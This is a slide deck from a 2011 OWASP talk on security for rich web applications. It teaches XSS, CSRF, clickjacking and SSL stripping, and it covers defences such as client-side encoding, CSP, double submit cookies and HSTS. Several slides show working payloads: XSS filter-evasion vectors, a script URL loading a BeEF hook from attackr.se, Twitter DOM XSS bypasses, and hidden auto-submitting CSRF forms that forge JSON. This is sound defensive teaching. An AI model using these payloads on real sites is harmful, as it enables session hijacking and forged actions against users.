View
12.944
Download
1
Category
Tags:
Preview:
DESCRIPTION
In this session, you’ll learn about the top 10 security risks in web applications, and, with demos, how REST backends and rich JavaScript applications map to these risks. Current and upcoming countermeasures include new HTTP headers, double submit cookies, and escaping input client-side to avoid DOM-based XSS. We’ll look at each of these, discuss the techniques you’ll want to add to your developer toolbox, and how to build reasonable security processes into an agile team environment.
Citation preview
Application Security for RIAs
John Wilander, & OWASP
Wednesday, November 2, 2011
Frontend developer atSvenska Handelsbanken
Researcher in application security
Co-leader OWASP Sweden
OWASP == The Open Web Application Security Project
Cheat sheets, tools, code, guidelines
https://owasp.org
@johnwilander
johnwilander.com (music)
Wednesday, November 2, 2011
ÅåÄäÖö
Wednesday, November 2, 2011
OWASP Top 10Top web applicationsecurity risks 2010
Wednesday, November 2, 2011
1. Injection2. Cross-Site Scripting (XSS)3. Broken Authentication and Session
Management4. Insecure Direct Object References5. Cross-Site Request Forgery (CSRF)6. Security Misconfiguration7. Insecure Cryptographic Storage8. Failure to Restrict URL Access9. Insufficient Transport Layer Protection10.Unvalidated Redirects and Forwards
Wednesday, November 2, 2011
”Do I have to care?”
Wednesday, November 2, 2011
From: WhiteHat Website Security Statistic Report, Winter 2011
Likelihood of ≥ 1 vulnerability on your site
Wednesday, November 2, 2011
Per extension
.asp .aspx .do .jsp .php
Sites having had ≥ 1serious vulnerability
74 % 73 % 77 % 80 % 80 %
Sites currently having ≥ 1serious vulnerability
57 % 58 % 56 % 59 % 63 %
From: WhiteHat Website Security Statistic Report, Spring 2010Wednesday, November 2, 2011
But we’re moving towards more
code client-side
Wednesday, November 2, 2011
From: IBM X-Force 2011 Mid-Year Trend and Risk Report
Client-Side, JavaScript Vulnerabilities
Wednesday, November 2, 2011
From: IBM X-Force 2011 Mid-Year Trend and Risk Report
Client-Side, JavaScript Vulnerabilities
Wednesday, November 2, 2011
• Cross-Site Scripting (XSS)• Cross-Site Request Forgery (CSRF)
• Clickjacking• Man-In-the-Middle SSL
Focus Today
Wednesday, November 2, 2011
XSS ...the hack that keeps on hacking
Wednesday, November 2, 2011
Cross-Site ScriptingTheory
Cross-Site
Scripting
Wednesday, November 2, 2011
Cross-Site ScriptingType 1, reflected
Cross-Site
Scripting
Phising
Wednesday, November 2, 2011
Cross-Site ScriptingType 2, stored
Cross-Site
Wednesday, November 2, 2011
Cross-Site ScriptingType 2, stored
Scripting
Wednesday, November 2, 2011
Cross-Site ScriptingType 0, DOM-based
Cross-Site
Scripting
Phising
Wednesday, November 2, 2011
Cross-Site ScriptingType 0, DOM-based
Phising
Cross-Site
Scripting
No server roundtrip!
Also, single-page interfacesmake injected scripts ”stick”in the DOM.
Wednesday, November 2, 2011
https://secure.bank.com/authentication#language=sv&country=SE
Wednesday, November 2, 2011
https://secure.bank.com/authentication#language=sv&country=SE
Never sent to server
Be careful when you usethis data on your page
Wednesday, November 2, 2011
https://secure.bank.com/authentication#language=<script src="http://attackr.se:
3000/hook.js"></script>&country=SE
Would you click this?
Wednesday, November 2, 2011
https://secure.bank.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C
%2Fscript%3E&country=SE
Would you click this?
Wednesday, November 2, 2011
http://bit.ly/Yg4T32
Would you click this?
Wednesday, November 2, 2011
Filter out <script>?
http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
/** * Strips all script tags * @param {Object} value The text from which to strip script tags * @return {String} The stripped text */stripScripts : function(v) { return !v ? v : String(v).replace(stripScriptsRe, "");},
var ... , stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig,
Wednesday, November 2, 2011
Filter out <script>?<img src=1 onerror=alert(1)>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<body onload=alert('XSS')>
<table background="javascript:alert('XSS')">
¼script¾alert(¢XSS¢)¼/script¾
<video poster=javascript:alert(1)//
Wednesday, November 2, 2011
”C’mon, such attacks don’t really work,
do they?”
Yep, demo.
Wednesday, November 2, 2011
DOM-Based XSSTwitter September 2010
Full story athttp://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
What does this code do?
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returns”/johnwilander”
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returns”/johnwilander”
window.location = ”/johnwilander”initial ’/’ => keeps the domain but changes the path
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returns”/johnwilander”
window.location = ”/johnwilander”initial ’/’ => keeps the domain but changes the path
Sotwitter.com/#!/johnwilanderbecomestwitter.com/johnwilander
Read more: http://kotowicz.net/absolute/
Wednesday, November 2, 2011
http://twitter.com/#!javascript:alert(document.domain);
Wednesday, November 2, 2011
http://twitter.com/#!javascript:alert(document.domain);
Never sent to server=> DOM-based XSS
Wednesday, November 2, 2011
var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}
The Patch™
Wednesday, November 2, 2011
var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}
Replaces the first occuranceof the search string
The Patch™
Wednesday, November 2, 2011
http://twitter.com/#!javascript::alert(document.domain);
Wednesday, November 2, 2011
http://twitter.com/#!javascript::alert(document.domain);
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
The 2nd Patch™
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp pattern
delimiters
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
Global match
Regexp patterndelimiters
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
Global match Ignore case
Regexp patterndelimiters
Wednesday, November 2, 2011
Were they done now?
Wednesday, November 2, 2011
http://twitter.com#!javascript&x58;alert(1)
Wednesday, November 2, 2011
http://twitter.com#!javascript&x58;alert(1)
HTML entity version of ’:’
Wednesday, November 2, 2011
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; }})(window);
The n:th Patch™(this one works)
And hey, Twitter is doing the right thing: https://twitter.com/about/security
Wednesday, November 2, 2011
Fix these issues properly with ...
Client-Side Encoding
Wednesday, November 2, 2011
https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize()
Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS()Encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML()Encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute()Encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript()Encodes for safe usage in event handlers etc
• $.encoder.encodeForURL()Encodes for safe usage in href etc
Wednesday, November 2, 2011
https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize()
Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS()Encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML()Encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute()Encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript()Encodes for safe usage in event handlers etc
• $.encoder.encodeForURL()Encodes for safe usage in href etc
Wednesday, November 2, 2011
Let’s do a short demo of that
Wednesday, November 2, 2011
Also, check out ...
Content Security Policyhttp://people.mozilla.com/~bsterne/
content-security-policy/
Wednesday, November 2, 2011
Only allow scripts from whitelisted domainsandonly allow scripts from files, i.e. no inline scripts
New HTTP Response Header Saying ...
Wednesday, November 2, 2011
'self' = same URL, protocol and port
X-Content-Security-Policy: default-src 'self'Accept all content including scripts only from my own URL+port
X-Content-Security-Policy: default-src *; script-src trustedscripts.foo.com Accept media only from my URL+port (images, stylesheets, fonts, ...) and scripts only from trustedscripts.foo.com
Wednesday, November 2, 2011
CSRFmy current favorite!
Wednesday, November 2, 2011
Cross-Site Request Forgery
Cross-Site
Request Forgery
Wednesday, November 2, 2011
Cross-Site Request Forgery
Cross-Site
Request Forgery
Phising
Wednesday, November 2, 2011
<img src=”https://secure.bank.com/logo.png" />
Is www.attackr.se allowed toload images like this:
?
Wednesday, November 2, 2011
<img src=”https://secure.bank.com/authentication#language=sv&country=SE" />
?
Is www.attackr.se allowed toload images like this:
Wednesday, November 2, 2011
<img src=”https://secure.bank.com/authentication#language=sv&country=SE"
height=0 width=0 />
With image tags www.attackr.se can silentlysend HTTP GET requests to any domain
Wednesday, November 2, 2011
”Will restricting to HTTP POST save me?”
Wednesday, November 2, 2011
What’s on your mind? What’s on your mind?POST POST
Wednesday, November 2, 2011
I love OWASP!
What’s on your mind? What’s on your mind?POST POST
Wednesday, November 2, 2011
I love OWASP!
What’s on your mind? What’s on your mind?POST POST
John: I love OWASP!
Wednesday, November 2, 2011
What’s on your mind? What’s on your mind?POST POST
Wednesday, November 2, 2011
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
Wednesday, November 2, 2011
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
Wednesday, November 2, 2011
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
John: I hate OWASP!
Wednesday, November 2, 2011
What’s on your mind? What’s on your mind?POST
John: I hate OWASP!
<form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/></form>
<script type="text/javascript"> $(document).ready(function() { $('#form').submit(); });</script>
Wednesday, November 2, 2011
What’s on your mind? What’s on your mind?POST
John: I hate OWASP!
<form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/></form>
<script> $(document).ready(function() { $('#target').submit(); });</script>
Wednesday, November 2, 2011
There used to be a protection in web 1.5
Wednesday, November 2, 2011
Forced Browsingwizard-style
Shipment info ✉
Next
Payment info $
Buy!
Wednesday, November 2, 2011
Forced Browsingwizard-style
Next Buy!
Token
Shipment info ✉ Payment info $
Wednesday, November 2, 2011
Forced Browsingwizard-style
Token 1 Token 2 Token 3
Token 3 Wednesday, November 2, 2011
Forced Browsingwizard-style
Token 1 Token 2 Token 3
State built up i steps, server roundtrip in-between
Token 3 Wednesday, November 2, 2011
Forced Browsingwizard-style
Token 1 Token 2 Token 3
Token 3
Couldn’t forge
request to
last ste
p
without a
valid token
Wednesday, November 2, 2011
But in RIAs ...
Wednesday, November 2, 2011
RIA & client-side state
{”purchase”: {}}
Wednesday, November 2, 2011
RIA & client-side state
{”purchase”: { ”items”: [{}] }}
Wednesday, November 2, 2011
RIA & client-side state
{”purchase”: { ”items”: [{},{}] }}
Wednesday, November 2, 2011
RIA & client-side state
{”purchase”: { ”items”: [{},{}], ”shipment”: {} }}
Wednesday, November 2, 2011
RIA & client-side state
{”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} }}
Wednesday, November 2, 2011
RIA & client-side state
{”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} }}
Wednesday, November 2, 2011
Can an attacker forge such a JSON structure?
Wednesday, November 2, 2011
CSRF possible?
{”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} }}
Wednesday, November 2, 2011
<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners">
<input type="text" name=”” value="" />
<input type="submit" value="Go" />
</form>
Wednesday, November 2, 2011
<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden">
<input type="text" name=”” value="" />
<input type="submit" value="Go" />
</form>
Wednesday, November 2, 2011
<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">
<input type="text" name=”” value="" />
<input type="submit" value="Go" />
</form>
Wednesday, November 2, 2011
<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">
<input type="text" name=”” value="" />
<input type="submit" value="Go" />
</form>
Forms produce a request body that looks like this:
theName=theValue
... and that’s not valid JSON.
Wednesday, November 2, 2011
<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">
<input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />
<input type="submit" value="Go" />
</form>
Wednesday, November 2, 2011
<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">
<input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />
<input type="submit" value="Go" />
</form>
Produces a request body that looks like this:
{"id": 0, "nickName": "John","oneLiner": "I hate OWASP!","timestamp": "20111006"}//=dummy
... and that is acceptable JSON!
Wednesday, November 2, 2011
Demo POST CSRF against REST service
Wednesday, November 2, 2011
Demo XSS + CSRF with
The Browser Exploitation Frameworkhttp://beefproject.com/
Wednesday, November 2, 2011
Important in yourREST API
• Restrict HTTP method, e.g. POSTEasier to do CSRF with GET
• Restrict to AJAX if applicableX-Requested-With:XMLHttpRequestCross-domain AJAX prohibited by default
• Restrict media type(s), e.g. application/jsonHTML forms only allow URL encoded, multi-part and text/plain
Wednesday, November 2, 2011
Attacker may spoof headers via Flash proxy
http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-February/007533.html
Wednesday, November 2, 2011
Double Submit
Wednesday, November 2, 2011
Double Submit(CSRF protection)
Anti-CSRF valueas cookie ...
... andrequest parameter
Wednesday, November 2, 2011
Double Submit(CSRF protection)
Cannot read theanti-CSRF cookie toinclude it as parameter
cookie ≠request parameter
Wednesday, November 2, 2011
Double Submit(CSRF protection)
Anti-CSRF cookie canbe generated client-side=> no server-side state
Wednesday, November 2, 2011
How To Get It Right
• Join your local OWASP chapterhttps://www.owasp.org/index.php/OWASP_Chapter
• Start following these fellas on Twitter:@WisecWisec @0x6D6172696F @garethheyes @internot_ @securityninja @jeremiahg @kkotowicz @webtonull @manicode @_mwc
• Start hacking – it’s fun!Best place to start? Your own apps of course.Just stay legal ;)
Wednesday, November 2, 2011
@johnwilanderjohn.wilander@owasp.org
http://appsandsecurity.blogspot.com
Wednesday, November 2, 2011
Clickjacking and MItMif there’s time
Wednesday, November 2, 2011
Clickjacking Demo
Wednesday, November 2, 2011
X-Frame-Optionshttp://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-
clickjacking-defenses.aspxhttp://tools.ietf.org/html/draft-
gondrom-frame-options-01
Wednesday, November 2, 2011
No page can load me in an iframeoronly my own domain can load me in an iframe
Wednesday, November 2, 2011
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
(Coming:X-Frame-Options: ALLOW-FROM [list])
Wednesday, November 2, 2011
MItM Demo
Wednesday, November 2, 2011
Moxie’s SSL Strip
Terminates SSL
Changes https to http
Normal https to the server
Acts as client
http https
Wednesday, November 2, 2011
Moxie’s SSL Striphttp https
Secure cookie?
Encoding, gzip?
Cached content?
Ongoing sessions?
Wednesday, November 2, 2011
Moxie’s SSL Strip
Strip secure attribute off all cookies
Strip off all request encodings
Strip off all if-modified-since in request
302 back to same page, set-cookie expired
http https
Secure cookie?
Encoding, gzip?
Cached content?
Ongoing sessions?
Wednesday, November 2, 2011
SSL Strip & Torlogin.yahoo.com
GmailHotmail
PayPal
11450139
In 24 h
Tor node
Tor node
Tor nodeTor nodeTor node
Tor exit node with SSL Strip
Wednesday, November 2, 2011
HTTP Strict Transport Security
http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-02
Wednesday, November 2, 2011
Require SSL without warnings for X seconds aheadandpotentially do the same for my subdomains too
Wednesday, November 2, 2011
Strict-Transport-Security: max-age=86400
Strict-Transport-Security: max-age=86400; includeSubdomains
Wednesday, November 2, 2011
W3C Web Application Security Working Grouphttp://www.w3.org/2011/webappsec/
Wednesday, November 2, 2011
Recommended